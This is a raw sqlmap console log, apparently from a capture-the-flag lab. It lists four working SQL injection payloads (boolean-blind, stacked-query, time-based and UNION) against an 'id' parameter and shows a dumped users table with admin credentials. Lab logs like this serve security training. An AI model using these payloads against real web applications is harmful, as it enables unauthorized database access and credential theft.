        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.6.6#pip}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:40:56 /2022-07-08/

[10:40:56] [INFO] resuming back-end DBMS 'mysql' 
[10:40:56] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 3620=3620

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: id=1;SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 6518 FROM (SELECT(SLEEP(5)))atGt)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-9570 UNION ALL SELECT CONCAT(0x71716b6b71,0x63676c74454564476e4c706a6c41616f53784e766d764f61414d544a656776675247786541714978,0x7176707171),NULL,NULL-- -
---
[10:40:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL >= 5.0.12
[10:40:57] [INFO] fetching columns for table 'users' in database 'sqhell_4'
[10:40:57] [INFO] fetching entries for table 'users' in database 'sqhell_4'
Database: sqhell_4
Table: users
[1 entry]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1  | password | admin    |
+----+----------+----------+

[10:40:57] [INFO] table 'sqhell_4.users' dumped to CSV file '/home/berran/.local/share/sqlmap/output/10.10.216.221/dump/sqhell_4/users.csv'
[10:40:57] [INFO] fetched data logged to text files under '/home/berran/.local/share/sqlmap/output/10.10.216.221'

[*] ending @ 10:40:57 /2022-07-08/

